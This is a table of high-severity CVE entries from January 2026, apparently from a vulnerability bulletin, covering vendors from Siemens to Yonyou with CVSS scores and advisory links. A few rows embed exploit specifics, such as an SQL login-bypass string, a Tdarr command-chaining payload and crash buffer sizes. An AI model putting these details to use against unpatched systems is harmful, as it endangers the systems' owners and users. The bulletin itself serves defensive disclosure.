| Siemens--TeleControl Server Basic | A vulnerability has been identified in TeleControl Server Basic (All versions < V3.1.2.4). Affected application contains a local privilege escalation vulnerability that could allow an attacker to run arbitrary code with elevated privileges. | 2026-01-13 | 8.8 | CVE-2025-40942 | https://cert-portal.siemens.com/productcert/html/ssa-192617.html |
| Skyjos--Owlfiles File Manager | Owlfiles File Manager 12.0.1 contains a path traversal vulnerability in its built-in HTTP server that allows attackers to access system directories. Attackers can exploit the vulnerability by crafting GET requests with directory traversal sequences to access restricted system directories on the device. | 2026-01-13 | 7.5 | CVE-2022-50890 | ExploitDB-51036 Vendor Homepage Official App Store Listing VulnCheck Advisory: Owlfiles File Manager 12.0.1 - Path Traversal |
| SLIMS--Senayan Library Management System | Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. Attackers can exploit the vulnerability by submitting crafted payloads to manipulate database queries and potentially extract sensitive information. | 2026-01-13 | 8.2 | CVE-2022-50805 | ExploitDB-51161 Senayan Library Management System Official Website Vulnerability Research Repository VulnCheck Advisory: Senayan Library Management System 9.0.0 - SQL Injection |
| Smartertools--SmarterTools SmarterTrack | SmarterTrack 7922 contains an information disclosure vulnerability in the Chat Management search form that reveals agent identification details. Attackers can access the vulnerable /Management/Chat/frmChatSearch.aspx endpoint to retrieve agents' first and last names along with their unique identifiers. | 2026-01-15 | 7.5 | CVE-2020-36926 | ExploitDB-50328 SmarterTools Official Homepage SmarterTrack Product Page VulnCheck Advisory: SmarterTools SmarterTrack 7922 -Information Disclosure |
| Smartftp--SmartFTP Client | SmartFTP Client 10.0.2909.0 contains multiple denial of service vulnerabilities that allow attackers to crash the application through specific input manipulation. Attackers can trigger crashes by entering malformed paths, using invalid IP addresses, or clearing connection history in the client's interface. | 2026-01-15 | 7.5 | CVE-2021-47791 | ExploitDB-50266 SmartFTP Official Homepage SmartFTP Download Page VulnCheck Advisory: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service |
| SMCI--X12STW-F | There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X12STW-F . An attacker can update the system firmware with a specially crafted image. | 2026-01-16 | 7.2 | CVE-2025-12006 | https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2026 |
| SMCI--X13SEM-F | There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X13SEM-F . An attacker can update the system firmware with a specially crafted image. | 2026-01-16 | 7.2 | CVE-2025-12007 | https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2026 |
| SMEWebify--WebErpMesv2 | WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19. | 2026-01-12 | 8.2 | CVE-2026-22788 | https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w https://github.com/SMEWebify/WebErpMesv2/commit/3a7ab1c95d1d1c8f7c62c84bc87b3666ecd2fa23 |
| Softlink Education--Oliver Library Server | Oliver Library Server v5 contains a file download vulnerability that allows unauthenticated attackers to access arbitrary system files through unsanitized input in the FileServlet endpoint. Attackers can exploit the vulnerability by manipulating the 'fileName' parameter to download sensitive files from the server's filesystem. | 2026-01-15 | 9.8 | CVE-2021-47755 | ExploitDB-50599 Oliver Library Server Official Product Homepage |
| Splashtop--Splashtop | Splashtop 8.71.12001.0 contains an unquoted service path vulnerability in the Splashtop Software Updater Service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files (x86)\Splashtop\Splashtop Software Updater\ to inject malicious executables and escalate privileges. | 2026-01-13 | 8.4 | CVE-2022-50693 | ExploitDB-51182 Splashtop Official Homepage VulnCheck Advisory: Splashtop 8.71.12001.0 - Unquoted Service Path |
| Splinterware--iDailyDiary | iDailyDiary 4.30 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the preferences tab name field. Attackers can paste a 2,000,000 character buffer into the default diary tab name to trigger an application crash. | 2026-01-16 | 7.5 | CVE-2021-47824 | ExploitDB-49898 Vendor Homepage VulnCheck Advisory: iDailyDiary 4.30 - Denial of Service (PoC) |
| Spy-Emergency--Spy Emergency | Spy Emergency 25.0.650 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted file paths in SpyEmergencyHealth.exe and SpyEmergencySrv.exe to inject malicious code during system startup or service restart. | 2026-01-16 | 7.8 | CVE-2021-47845 | ExploitDB-49997 Vendor Homepage VulnCheck Advisory: Spy Emergency 25.0.650 - Unquoted Service Path |
| stellarwp--Membership Plugin Restrict Content | The Membership Plugin - Restrict Content plugin for WordPress is vulnerable to Missing Authentication in all versions up to, and including, 3.2.16 via the 'rcp_stripe_create_setup_intent_for_saved_card' function due to missing capability check. Additionally, the plugin does not check a user-controlled key, which makes it possible for unauthenticated attackers to leak Stripe SetupIntent client_secret values for any membership. | 2026-01-16 | 8.2 | CVE-2025-14844 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c28545d-c7cd-469f-bccf-90e8b52fd4e7?source=cve https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/gateways/stripe/functions.php#L848 https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/gateways/stripe/functions.php#L987 https://docs.stripe.com/api/setup_intents/object https://cwe.mitre.org/data/definitions/639.html https://plugins.trac.wordpress.org/changeset/3438168/restrict-content/tags/3.2.17/core/includes/gateways/stripe/functions.php |
| strongSwan--strongSwan | In the eap-mschapv2 plugin (client-side) in strongSwan before 6.0.3, a malicious EAP-MSCHAPv2 server can send a crafted message of size 6 through 8, and cause an integer underflow that potentially results in a heap-based buffer overflow. | 2026-01-16 | 8.1 | CVE-2025-62291 | https://github.com/strongswan/strongswan/releases https://github.com/strongswan/strongswan/commits/master/src/libcharon/plugins/eap_mschapv2 https://www.strongswan.org/blog/2025/10/27/strongswan-vulnerability-%28cve-2025-62291%29.html |
| suitenumerique--docs | LaSuite Doc is a collaborative note taking, wiki and documentation platform. From 3.8.0 to 4.3.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Interlinking feature. When a user creates a link to another document within the editor, the URL of that link is not validated. An attacker with document editing privileges can inject a malicious javascript: URL that executes arbitrary code when other users click on the link. This vulnerability is fixed in 4.4.0. | 2026-01-15 | 8.7 | CVE-2026-22867 | https://github.com/suitenumerique/docs/security/advisories/GHSA-4rwv-ghwh-9rv6 https://github.com/suitenumerique/docs/commit/e807237dbedbc189230296b81c3aeccc1c04fa77 https://github.com/suitenumerique/docs/releases/tag/v4.4.0 |
| sumatrapdfreader--sumatrapdf | SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, there is a Untrusted Search Path vulnerability when Advanced Options setting is trigger. The application executes notepad.exe without specifying an absolute path when using the Advanced Options setting. On Windows, this allows execution of a malicious notepad.exe placed in the application's installation directory, leading to arbitrary code execution. | 2026-01-14 | 8.6 | CVE-2026-23512 | https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-rqg5-gj63-x4mv https://github.com/sumatrapdfreader/sumatrapdf/commit/2762e02a8cd7cb779c934a44257aac56ab7de673 |
| Support--Brother BRPrint Auditor | Brother BRPrint Auditor 3.0.7 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted file paths in BrAuSvc and BRPA_Agent services to inject malicious executables and escalate privileges on the system. | 2026-01-15 | 7.8 | CVE-2020-36929 | ExploitDB-50005 Brother BRPrint Auditor Download Page (NL) Brother BRPrint Auditor Download Page (FR) VulnCheck Advisory: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path |
| sveltejs--devalue | Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.3.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the typed array hydration expecting an ArrayBuffer as input, but not checking the assumption before creating the typed array. This vulnerability is fixed in 5.6.2. | 2026-01-15 | 7.5 | CVE-2026-22774 | https://github.com/sveltejs/devalue/security/advisories/GHSA-vw5p-8cq8-m7mv https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7 https://github.com/sveltejs/devalue/releases/tag/v5.6.2 |
| sveltejs--devalue | Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.1.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the ArrayBuffer hydration expecting base64 encoded strings as input, but not checking the assumption before decoding the input. This vulnerability is fixed in 5.6.2. | 2026-01-15 | 7.5 | CVE-2026-22775 | https://github.com/sveltejs/devalue/security/advisories/GHSA-g2pg-6438-jwpf https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4 https://github.com/sveltejs/devalue/releases/tag/v5.6.2 |
| Sylkat-Tools--AWebServer GhostBuilding | AWebServer GhostBuilding 18 contains a denial of service vulnerability that allows remote attackers to overwhelm the server by sending multiple concurrent HTTP requests. Attackers can generate high-volume requests to multiple endpoints including /mysqladmin to potentially crash or render the service unresponsive. | 2026-01-15 | 7.5 | CVE-2021-47752 | ExploitDB-50629 Vendor Homepage Software Download Link |
| Syncbreeze--Sync Breeze | Sync Breeze 13.6.18 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in service binaries located in 'Program Files' directories to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47807 | ExploitDB-50023 Vendor Homepage VulnCheck Advisory: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path |
| Sysax--Sysax Multi Server | Sysax Multi Server 6.95 contains a denial of service vulnerability in the administrative password field that allows attackers to crash the application. Attackers can overwrite the password field with 800 bytes of repeated characters to trigger an application crash and disrupt server functionality. | 2026-01-13 | 7.5 | CVE-2023-54337 | ExploitDB-51066 Vendor Homepage VulnCheck Advisory: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) |
| Sysgauge--SysGauge | SysGauge Server 7.9.18 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\SysGauge Server\bin\sysgaus.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2020-36930 | ExploitDB-50009 Vendor Homepage VulnCheck Advisory: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path |
| Tagstoo--Tagstoo | Tagstoo 2.0.1 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious payloads through files or custom tags. Attackers can execute arbitrary JavaScript code to spawn system processes, access files, and perform remote code execution on the victim's computer. | 2026-01-15 | 7.2 | CVE-2021-47843 | ExploitDB-49828 Tagstoo Official Homepage Proof of Concept Video |
| Tdarr--Tdarr | Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication. | 2026-01-13 | 9.8 | CVE-2022-50919 | ExploitDB-50822 Official Vendor Homepage VulnCheck Advisory: Tdarr 2.00.15 - Command Injection |
| TeamSpeak--TeamSpeak | TeamSpeak 3.5.6 contains an insecure file permissions vulnerability that allows local attackers to replace executable files with malicious binaries. Attackers can replace system executables like ts3client_win32.exe with custom files to potentially gain SYSTEM or Administrator-level access. | 2026-01-13 | 8.4 | CVE-2022-50931 | ExploitDB-50743 TeamSpeak Official Vendor Homepage TeamSpeak Downloads Page VulnCheck Advisory: TeamSpeak 3.5.6 - Insecure File Permissions |
| Telcel--FLAME II MODEM USB | Flame II HSPA USB Modem contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Internet Telcel\ApplicationController.exe' to execute arbitrary code with elevated system privileges. | 2026-01-13 | 9.8 | CVE-2022-50935 | ExploitDB-50708 Archived Telcel Flame II MODEM USB Product Page VulnCheck Advisory: FLAME II MODEM USB - Unquoted Service Path |
| Telegram--Telegram Desktop | Telegram Desktop 2.9.2 contains a denial of service vulnerability that allows attackers to crash the application by sending an oversized message payload. Attackers can generate a 9 million byte buffer and paste it into the messaging interface to trigger an application crash. | 2026-01-15 | 7.5 | CVE-2021-47793 | ExploitDB-50247 Official Telegram Homepage VulnCheck Advisory: Telegram Desktop 2.9.2 - Denial of Service (PoC) |
| Tenable--Nessus Agent | A vulnerability has been identified in the installation/uninstallation of the Nessus Agent Tray App on Windows Hosts which could lead to escalation of privileges. | 2026-01-13 | 8.8 | CVE-2025-36640 | https://www.tenable.com/security/tns-2026-01 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0. | 2026-01-12 | 8 | CVE-2026-22804 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35 |
| Testlink--TestLink | TestLink versions 1.16 through 1.19 contain an unauthenticated file download vulnerability in the attachmentdownload.php endpoint. Attackers can download arbitrary files by iterating file IDs through the 'id' parameter with 'skipCheck=1' to bypass access controls. | 2026-01-15 | 9.8 | CVE-2021-47760 | ExploitDB-50578 Official TestLink Product Homepage Archived Researcher Blog |
| The Browser Company of New York--Dia | Missing about:blank indicator in custom-sized new windows in Dia before 1.9.0 on macOS could allow an attacker to spoof a trusted domain in the window title and mislead users about the current site. | 2026-01-16 | 7.4 | CVE-2025-15032 | https://www.diabrowser.com/security/bulletins#CVE-2025-15032 |
| Thecus--Thecus N4800Eco Nas Server Control Panel | Thecus N4800Eco NAS Server Control Panel contains a command injection vulnerability that allows authenticated attackers to execute arbitrary system commands through user management endpoints. Attackers can inject commands via username and batch user creation parameters to execute shell commands with administrative privileges. | 2026-01-16 | 8.8 | CVE-2021-47816 | ExploitDB-49926 Thecus Official Vendor Homepage Thecus N4800Eco Product Page Researcher Blog VulnCheck Advisory: Thecus N4800Eco Nas Server Control Panel - Command Injection |
| Totalav--TotalAV | TotalAV 5.15.69 contains an unquoted service path vulnerability in multiple system services running with LocalSystem privileges. Attackers can place malicious executables in specific unquoted path segments to potentially gain SYSTEM-level access by exploiting the service path configuration. | 2026-01-15 | 7.8 | CVE-2021-47787 | ExploitDB-50314 TotalAV Official Homepage VulnCheck Advisory: TotalAV 5.15.69 - Unquoted Service Path |
| tridenttechnolabs--Shipping Rate By Cities | The Shipping Rate By Cities plugin for WordPress is vulnerable to SQL Injection via the 'city' parameter in all versions up to, and including, 2.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-14 | 7.5 | CVE-2025-14770 | https://www.wordfence.com/threat-intel/vulnerabilities/id/11e7e798-9fb9-4cff-a96f-a0003f203f5f?source=cve https://plugins.trac.wordpress.org/browser/shipping-rate-by-cities/trunk/shiprate-cities-method-class.php#L372 |
| Umbraco--Forms | In Umbraco UmbracoForms through 8.13.16, an authenticated attacker can supply a malicious WSDL (aka Webservice) URL as a data source for remote code execution. | 2026-01-16 | 7.5 | CVE-2025-68924 | https://our.umbraco.com/packages/developer-tools/umbraco-forms/ https://github.com/advisories/GHSA-vrgw-pc9c-qrrc https://www.nuget.org/packages/UmbracoForms |
| vaghasia3--News and Blog Designer Bundle | The News and Blog Designer Bundle plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1 via the template parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-01-14 | 9.8 | CVE-2025-14502 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e02683dc-0771-4bd5-bba3-2b5423da1c80?source=cve https://plugins.trac.wordpress.org/browser/news-and-blog-designer-bundle/trunk/includes/class-nbdb-ajax.php#L31 |
| vesparny--Marky | Marky 0.0.1 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47839 | ExploitDB-49831 Marky GitHub Repository Proof of Concept Video VulnCheck Advisory: Marky 0.0.1 - Persistent Cross-Site Scripting |
| Vianeos--Vianeos OctoPUS | Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. Attackers can exploit this vulnerability by crafting malicious POST requests with specially constructed SQL payloads that trigger database sleep functions to extract information. | 2026-01-15 | 8.2 | CVE-2021-47801 | ExploitDB-50078 Vendor Homepage Software Product Page VulnCheck Advisory: Vianeos OctoPUS 5 - 'login_user' SQLi |
| VIAVIWEB--VIAVIWEB Wallpaper Admin | VIAVIWEB Wallpaper Admin 1.0 contains an unauthenticated remote code execution vulnerability in the image upload functionality. Attackers can upload a malicious PHP file through the add_gallery_image.php endpoint to execute arbitrary code on the server. | 2026-01-13 | 9.8 | CVE-2022-50893 | ExploitDB-51033 Vendor Homepage VulnCheck Advisory: VIAVIWEB Wallpaper Admin 1.0 - Code Execution via Image Upload |
| VIAVIWEB--VIAVIWEB Wallpaper Admin | VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. Attackers can send GET requests to edit_gallery_image.php with malicious img_id values to extract database information. | 2026-01-13 | 9.8 | CVE-2022-50894 | ExploitDB-51033 Vendor Homepage VulnCheck Advisory: VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php |
| VIAVIWEB--VIAVIWEB Wallpaper Admin | VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface. | 2026-01-13 | 8.2 | CVE-2022-50892 | ExploitDB-51033 Vendor Homepage VulnCheck Advisory: VIAVIWEB Wallpaper Admin 1.0 - SQL Injection via Login Page |
| VIVE--VIVE Runtime Service | VIVE Runtime Service 1.0.0.4 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path by placing malicious executables in specific system directories to gain LocalSystem access during service startup. | 2026-01-13 | 8.4 | CVE-2022-50918 | ExploitDB-50824 Official VIVE Homepage VIVE Developer Downloads VulnCheck Advisory: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path |
| Wago--WAGO 750-8212 PFC200 | WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication. | 2026-01-13 | 9.8 | CVE-2022-50926 | ExploitDB-50793 Official Vendor Homepage VulnCheck Advisory: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation |
| Wbce--WBCE CMS | WBCE CMS version 1.5.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious droplets through the admin panel. Authenticated attackers can exploit the droplet upload functionality in the admin tools to create and execute arbitrary PHP code by crafting a specially designed zip file payload. | 2026-01-13 | 8.8 | CVE-2022-50936 | ExploitDB-50707 WBCE CMS Official Website WBCE CMS Downloads Page WBCE CMS GitHub Repository VulnCheck Advisory: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated) |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2. | 2026-01-16 | 8.1 | CVE-2026-23535 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-mmwx-79f6-67jg https://github.com/WeblateOrg/wlc/pull/1128 https://github.com/WeblateOrg/wlc/commit/216e691c6e50abae97fe2e4e4f21501bf49a585f https://github.com/WeblateOrg/wlc/releases/tag/1.17.2 |
| Websitebaker--WebsiteBaker | WebsiteBaker 2.13.0 contains an authenticated remote code execution vulnerability that allows users with language editing permissions to execute arbitrary code. Attackers can exploit the language installation endpoint by manipulating language installation parameters to achieve remote code execution on the server. | 2026-01-15 | 8.8 | CVE-2021-47788 | ExploitDB-50310 WebsiteBaker Official Homepage VulnCheck Advisory: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated) |
| WebSSH--WebSSH for iOS | WebSSH for iOS 14.16.10 contains a denial of service vulnerability in the mashREPL tool that allows attackers to crash the application by pasting malformed input. Attackers can trigger the vulnerability by copying a 300-character buffer of repeated 'A' characters into the mashREPL input field, causing the application to crash. | 2026-01-16 | 7.5 | CVE-2021-47827 | ExploitDB-49883 WebSSH iOS App Store Page VulnCheck Advisory: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service |
| Weird-Solutions--BOOTP Turbo | BOOTP Turbo 2.0.0.1253 contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path to execute arbitrary code with elevated LocalSystem privileges during system startup or reboot. | 2026-01-16 | 7.8 | CVE-2021-47828 | ExploitDB-49851 Vendor Homepage VulnCheck Advisory: BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path |
| Weird-Solutions--DHCP Broadband | DHCP Broadband 4.1.0.1503 contains an unquoted service path vulnerability in its service configuration that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path in 'C:\Program Files\DHCP Broadband 4\dhcpt.exe' to inject malicious code that will execute during service startup with LocalSystem permissions. | 2026-01-16 | 7.8 | CVE-2021-47829 | ExploitDB-49850 Vendor Homepage VulnCheck Advisory: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path |
| Wibu--WibuKey Runtime | WibuKey Runtime 6.51 contains an unquoted service path vulnerability in the WkSvW32.exe service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\PROGRAM FILES (X86)\WIBUKEY\SERVER\WkSvW32.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47810 | ExploitDB-49999 Vendor Homepage Software Download Page VulnCheck Advisory: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path |
| Wisecleaner--Wise Care | Wise Care 365 5.6.7.568 contains an unquoted service path vulnerability in the WiseBootAssistant service running with LocalSystem privileges. Attackers can exploit this by inserting a malicious executable in the service path, which will execute with elevated system privileges when the service restarts. | 2026-01-15 | 7.8 | CVE-2021-47804 | ExploitDB-50038 Official Vendor Homepage VulnCheck Advisory: Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path |
| Wondershare--Wondershare Dr.Fone | Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50900 | ExploitDB-50813 Vendor Homepage VulnCheck Advisory: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path |
| Wondershare--Wondershare Dr.Fone | Wondershare Dr.Fone 11.4.9 contains an unquoted service path vulnerability in the DFWSIDService that allows local users to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\ to inject malicious executables that would run with LocalSystem privileges. | 2026-01-13 | 8.4 | CVE-2022-50901 | ExploitDB-50755 Vendor Homepage VulnCheck Advisory: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path |
| Wondershare--Wondershare FamiSafe | Wondershare FamiSafe 1.0 contains an unquoted service path vulnerability in the FSService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Wondershare\FamiSafe\ to inject malicious code that would run with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50902 | ExploitDB-50757 Vendor Homepage VulnCheck Advisory: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path |
| Wondershare--Wondershare MobileTrans | Wondershare MobileTrans 3.5.9 contains an unquoted service path vulnerability in the ElevationService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path by placing malicious executables in specific filesystem locations that will be executed with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50903 | ExploitDB-50756 Vendor Homepage VulnCheck Advisory: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path |
| Wondershare--Wondershare UBackit | Wondershare UBackit 2.0.5 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the wsbackup service to inject malicious executables that would run with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50904 | ExploitDB-50758 Vendor Homepage VulnCheck Advisory: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path |
| woosaai--Integration Opvius AI for WooCommerce | The Integration Opvius AI for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.0. This is due to the `process_table_bulk_actions()` function processing user-supplied file paths without authentication checks, nonce verification, or path validation. This makes it possible for unauthenticated attackers to delete or download arbitrary files on the server via the `wsaw-log[]` POST parameter, which can be leveraged to delete critical files like `wp-config.php` or read sensitive configuration files. | 2026-01-14 | 9.8 | CVE-2025-14301 | https://www.wordfence.com/threat-intel/vulnerabilities/id/34612902-1a26-4759-bca6-b5aaffa25af4?source=cve https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L41 https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L25 https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L79 https://plugins.trac.wordpress.org/browser/woosa-ai-for-woocommerce/tags/1.3.0/vendor/woosa/logger/class-module-logger-hook.php#L160 |
| Wordpress--Social-Share-Buttons | Social-Share-Buttons 2.2.3 contains a critical SQL injection vulnerability in the project_id parameter that allows attackers to manipulate database queries. Attackers can exploit this vulnerability by sending crafted POST requests with malicious SQL payloads to retrieve and potentially steal entire database contents. | 2026-01-13 | 8.2 | CVE-2023-54333 | ExploitDB-51116 WP Plugin Webpage Vulnerability Research Repository VulnCheck Advisory: Social-Share-Buttons 2.2.3 - SQL Injection via project_id Parameter |
| WorkOrder--WorkOrder CMS | WorkOrder CMS 0.1.0 contains a SQL injection vulnerability that allows unauthenticated attackers to bypass login by manipulating username and password parameters. Attackers can inject malicious SQL queries using techniques like OR '1'='1' and stacked queries to access database information or execute administrative commands. | 2026-01-13 | 8.2 | CVE-2023-54340 | ExploitDB-51038 WorkOrder CMS GitHub Repository VulnCheck Advisory: WorkOrder CMS 0.1.0 - SQL Injection |
| Yenkee--Yenkee Hornet Gaming Mouse | Yenkee Hornet Gaming Mouse driver GM312Fltr.sys contains a buffer overrun vulnerability that allows attackers to crash the system by sending oversized input. Attackers can exploit the driver by sending a 2000-byte buffer through DeviceIoControl to trigger a kernel-level system crash. | 2026-01-15 | 7.5 | CVE-2021-47789 | ExploitDB-50311 Yenkee Vendor Webpage Quadron Research Lab Kernel Driver Bugs Repository VulnCheck Advisory: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) |
| Yonyou--KSOA | A vulnerability has been found in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /worksheet/del_work.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1120 | VDB-341712 | Yonyou KSOA HTTP GET Parameter del_work.jsp sql injection VDB-341712 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734535 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/6 |
| Yonyou--KSOA | A vulnerability was found in Yonyou KSOA 9.0. This affects an unknown function of the file /worksheet/del_workplan.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1121 | VDB-341713 | Yonyou KSOA HTTP GET Parameter del_workplan.jsp sql injection VDB-341713 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734548 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/7 |
